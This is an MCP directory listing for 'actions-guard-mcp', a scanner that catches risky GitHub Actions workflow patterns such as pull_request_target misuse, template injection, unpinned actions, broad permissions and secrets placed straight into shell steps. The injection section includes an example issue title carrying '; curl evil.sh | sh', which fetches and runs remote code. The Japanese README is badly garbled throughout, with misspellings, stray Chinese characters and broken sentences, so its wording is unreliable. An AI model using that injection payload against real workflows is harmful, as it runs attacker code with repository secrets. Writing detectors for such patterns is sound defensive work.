actions-guard-mcp
actions-guard-mcp
GitHub Actions のワークフロー・セキュリティ・スキャナで、MCP ツールとして用公開されています。エージェントが「pwn リクエスト」やサプライチェーン攻撃の(实际のインシデントを、作っかした(CoreShop、stの、tj-actions など))パターンを、ワークフローファイルがコミットされる前に — コミット後ではなく — 検出できるようにするためのものです。
これが存在する理由
GitHub Actions ワークフロー向けの静的解析は、成熟コ、よく理解されたコ分野です。izのmmor() は、正にこれを対する、信頼があり能動的にメンテンスされているスタンドアローソーすキャナです。まだ存しないのは、その稿の解析を本格的にリップする MCP ラッパーです。広い検索の検で見つけたプロジー1のジェクト(github-vulnerability)は、45 のチェックを組ンの設定・シークレット・サプライチェーンの岐をこ Actions を1 つの汎用ツールに散らしたものです — 12 スターら、5 ヶ月間作にコミットなら。ワークフロのセキュリティ・ビ所に、ディープな、エージェントがワークフローファイル能動中に書くこと・レビュー中に呼び出すものは、何もあり。
Related MCP server: vibecheck
検出するもの
危険なトリガ(AGMCP-101) —
pull_request_targetまたはworkflow_runが、ref:やrepository:をトリガーとなった PR / ランそのもののフォークに指すチェックアウト・ステップと組み合わっているケース。これは CoreShop インシデントがジックトの同じ形です。ベース・リポジトリのトークンとシークレットで実ルが、トリガーのンたフォークのコーダをチュックアウトして実ルするワークフローです。
*テンプレート注込む(AGMCP-102)** — アのタッカの制御らされるコンテキスト(github.event.issue.title、github.event.pull_request.title、github.event.comment.body、github.head_ref、toJSON(github.event)のペイロード全体ダンプなどからの) から構築された${{ ... }} 式が、env:を経由しれずにrun:に直接にステップ・インターンではなく直接挿入されているケース。古典的形はrun: echo "${{ github.event.issue.title }}"— のアン issue のタイトール"; curl evil.sh | sh #` を、そのポイの時点では文字列ではなくシェルです。
ピン付けれていないアクションと再利用可能ワークフロー(AGMCP-103) —
uses: --owner/repo@v4(タグ / ブランチ、両方変更可能)を使う代わりに、固定されたコミット SH を使う; ジョブレベルの再利用可能ワークフローの呼び出し(jobs.<id>.uses: owner/repo/.github/workflows/x.yml@main)が同じ様にピンされていない(もしくはdocker://image:tagが@sha256:ダイジェストに固定されていない)。これは tj-actions 事件が使った「のソプライチェーン攻撃面」其のものです。不得勝されたタグが、バーションの上げるあることしに、それを用いる全員を悪意あるコードにポインドさせたのです。こうした事件の hidden 核心です。過剰な権限(AGMCP-104) —
permissions: write-allが、または明し的な広い scope なwriteスコープ(contents、actions、packagesなど)が、ワークフロー・レベルかジョブ・レベルのいずれ以下で、リスクのあるトリガーも持ったるワークフローに設定されえてある — より狭いスコープで足りるのに。シェルにインターリ入されたシークレット(AGMCP-105) —
${{ secrets.X }}をenv:を経由せずに直接るrun:ステップで使用す — 生のシークレット値が、環境変数ではなく、シェルのコマンド・ラインやプロセス一覧に不必要にサされるです。
すべてのマーカ・マッチング(AGMCP-101 / 102 / 105)でが、GitHub Actions の「ブラケット記法」プロパティ・アクセス(github.event['issue']['title'])を、相当しるドット記法に正規化し、大文字・小文字をを無视のないマッチします。表現言語ではその両方のが同一扱いられるからです。
既知なの制限
これはパターンマッチングです — ノーです。の「完全な GitHub Actions 式パーサでも、データフロー分析でもありません。${{ }} 式と with: / permissions: ブロックのテキスト、そのリテラルな文字列に照合てるものです。クリーン・スキャンとは「書かれたままの中に、既知の危険なパターンがない」を意味するのであって、ワークフローの安全性の保証ではありません。コノクリートにの:
クロス・ステープ /
env:のデタフロー追跡のなし。 危険な値が、中間のenv:変数やステップの出力を経由し、チェックアウト・のref:やrun:コマンドに到ル場合、AGMCP-101/102/み105 からは見えません — 検査対象のフィールドのリテラルなのみが検査されます。攻撃者が制御テキスト・マーカ一覧(AGMCP-102)は 有限で手動メンテされているセットであり、GitHub Actions が公開する、すべ のコンテキストールを網羅にある列挙で行の行の権はありません。リストアップされれい新種のフィールド存在していてもあります。
クリーンな結果がセキュリティの判断に関わるなら、そのを「最後の言葉」扱いせず、zizmor の、同ジュゴルのファイルに対しもっと深く、より汎用的な静的解析を行うので、このツールの代わりではなく、併用して実行する価値があります。
セットアップ
pip install actions-guard-mcp
actions-guard-mcpセットアップは必要ありません — すべてのツールは、ワークフローファイルのパス、またはその生の YAML コンテンツを直引直接受け取ります。
状 態
アーリー・ビルド。
ライセンス
MIT
Maintenance
Resources
Unclaimed servers have limited discoverability.
Looking for Admin?
If you are the server author, to access and configure the admin panel.
Related MCP Servers
- AlicenseAqualityDmaintenanceAn MCP server that enables AI agents to perform comprehensive GitHub security audits across org settings, repositories, Actions workflows, secrets, supply chain, and access control using 39 tools and 45 checks.3952112MIT
- AlicenseAqualityBmaintenanceAgent-native "safe to ship?" security gate for AI-generated code. Uses real parsers and inter-rocedural taint analysis (JS/TS, Python, Go) to flag the classes AI coding agents get wrong — secrets, SQL injection, SS, SSRF, path traversal, command injection, weak JWT/CORS — and ranks findings by confidence. Exposes a scan tool over MCP.162MIT
- AlicenseAqualityAmaintenanceLocal-only GitHub Actions and CI maintenance scanner for AI-built apps. Exposes scan, explanation, and fix-planning tools to MCP clients; modifies nothing and makes no outbound requests by default.3632MIT
- AlicenseAqualityBmaintenanceVerify-before-act safety tools for AI coding agents, providing MCP tools to check packages, lockfiles, manifests, and CI workflows for supply chain risks.449MIT
Related MCP Connectors
GitHub Actions workflow security audit - 21 checks: pinning, permissions, secrets, injection.
Scans MCP servers for tool poisoning, prompt injection and supply chain risks.
Screens public GitHub repos and PRs to generate risk maps, findings, and merge-readiness signals.
Latest Blog Posts
- Who's Calling? MCP Hosts Are an Identity Blind Spot (And the Spec Knows It)By Om-Shree-0709 on .mcpAgent IdentityOAuth 2.1
- Your AI Chatbot Just Exposed Your CEO's Salary to an InternBy Om-Shree-0709 on .Agent IdentityMCP SecurityOAuth Delegation
- Why MCP Servers Need Execution Sandboxing (And Why Your Current Stack Isn't Enough)By Om-Shree-0709 on .Agentic AiPrompt InjectionWebAssembly
MCP directory API
We provide all the information about MCP servers via our MCP API.
curl -X GET 'https://glama.ai/api/mcp/v1/servers/BerkantACUN/actions-guard-mcp'
If you have feedback or need assistance with the MCP directory API, please join our Discord server